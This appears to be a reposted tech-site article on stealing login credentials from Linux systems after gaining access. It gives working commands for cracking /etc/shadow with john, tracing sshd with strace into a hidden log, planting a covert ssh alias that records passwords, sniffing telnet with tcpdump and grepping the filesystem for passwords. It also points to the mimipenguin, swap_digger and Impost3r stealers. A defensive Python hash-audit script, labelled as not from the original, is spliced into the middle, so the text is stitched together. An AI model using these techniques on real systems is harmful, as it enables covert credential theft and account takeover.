2025-02-27 Update From: SLTechnology News&Howtos, Shulou (Shulou.com) 06/01 Report
This article introduces techniques for capturing login credentials on Linux. It is intended as a reference for readers interested in the topic.
For reference and study only
01. Sensitive operations recorded in history
Linux automatically records the commands a user runs in the shell history list. When a user types an account name and password on the command line to log in, that sensitive information is disclosed through the history.
02. Shadow file cracking
The shadow file stores password information for users of the Linux system. An example entry:
root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::
The password field consists of three parts: $id$salt$encrypted. When id is 1, MD5 is used, and a weak password is easily cracked.
When id is 5, SHA256 is used, and when id is 6, SHA512 is used; these can be brute-forced with john.
wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
make clean linux-x86-64
./john /etc/shadow
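A defensive counterpart to the field format above, as an added example that is not from the original article: a Python audit that splits the $id$salt$encrypted field of each shadow entry and reports accounts with an empty, legacy or MD5 ($1$) hash. It goes beyond the ids the article lists by also recognising the bcrypt and yescrypt ids from crypt(5); every sample line except the article's root line is constructed.

```python
"""Added example: classify /etc/shadow password fields by hash scheme."""

# id -> (scheme name, weak?). Ids 1, 5 and 6 are the ones the article names;
# the bcrypt and yescrypt ids are added here from crypt(5).
SCHEMES = {
    "1": ("MD5-crypt", True),
    "5": ("SHA-256-crypt", False),
    "6": ("SHA-512-crypt", False),
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "y": ("yescrypt", False),
}
WEAK = "weak or unknown scheme; rehash with SHA-512-crypt or yescrypt"


def classify(line):
    """Return (user, scheme, finding); finding is None when nothing to fix."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, pw = fields[0], fields[1]
    if pw == "":
        return user, "none", "empty password field"
    if pw[0] in "!*":
        return user, "locked", None  # locked account or no password login
    parts = pw.split("$")  # ['', id, (rounds=N or params,) salt, hash]
    if parts[0] != "" or len(parts) < 4:
        return user, "legacy", "non-modular (DES-era) or malformed hash"
    name, weak = SCHEMES.get(parts[1], ("unknown id " + parts[1], True))
    return user, name, WEAK if weak else None


def audit(lines):
    """Classify every non-blank line and keep only entries with a finding."""
    results = (classify(entry) for entry in lines if entry.strip())
    return [r for r in results if r[2] is not None]


# Constructed sample: the root line is the article's own, the rest are made up.
SAMPLE = """\
root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::
alice:$6$rounds=5000$constructedsalt$constructedhash:19000:0:99999:7:::
daemon:*:18000:0:99999:7:::
backup::18000:0:99999:7:::
olduser:aaCONSTRUCTED:18000:0:99999:7:::
""".splitlines()

if __name__ == "__main__":
    for user, scheme, finding in audit(SAMPLE):
        print("%-8s %-10s %s" % (user, scheme, finding))
```

To audit a live system, pass the lines of /etc/shadow (read as root) to audit(). A flagged account only moves to a stronger scheme when its password is next changed, after ENCRYPT_METHOD in /etc/login.defs has been set accordingly.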
03. Dumping passwords with mimipenguin
mimipenguin is a password-dumping tool for Linux that requires root privileges to run. It takes advantage of cleartext credentials in memory by dumping processes and extracting lines that are likely to contain cleartext passwords. It currently supports operating systems such as Kali and Ubuntu.
GitHub address:
https://github.com/huntergregal/mimipenguin
04. Using strace to collect login credentials
strace is a dynamic tracing tool that works much like a keylogger and can be used to collect login credentials.
(1) Obtain the plaintext password from the sshd process
(strace -f -F -p `ps aux | grep "sshd -D" | grep -v grep | awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
Use grep to match the user name and password:
# find the user name and password
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log
# the result has the form
[pid 2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid 2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid 2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9
(2) Collect ssh login credentials
# add the command alias
vi ~/.bashrc   # or /etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# make the command alias take effect immediately
source ~/.bashrc
Use grep to show the 8 lines after the matching line; the number of lines can be adjusted according to the length of the password.
grep -A 9 'password' .ssh-25Sep091601017212.log
05. tcpdump packet capture analysis
Capture packets and analyze them to obtain plaintext accounts and passwords from protocols such as ftp, telnet, and http.
tcpdump -i ens33 port 23 -w test.cap
06. Searching broadly for sensitive information
Search configuration files, scripts, databases, and log files across the whole system for passwords.
grep -rn "password=" /
07. swap_digger
A bash script that automates Linux swap analysis: it extracts the swap automatically and searches it for Linux user credentials, web form credentials, web form emails, HTTP basic authentication, WiFi SSIDs and keys, etc.
GitHub project address:
https://github.com/sevagas/swap_digger
08. Impost3r
A tool written in C that steals various passwords (ssh, su, sudo) on Linux.
GitHub project address:
https://github.com/ph5ntonn/Impost3r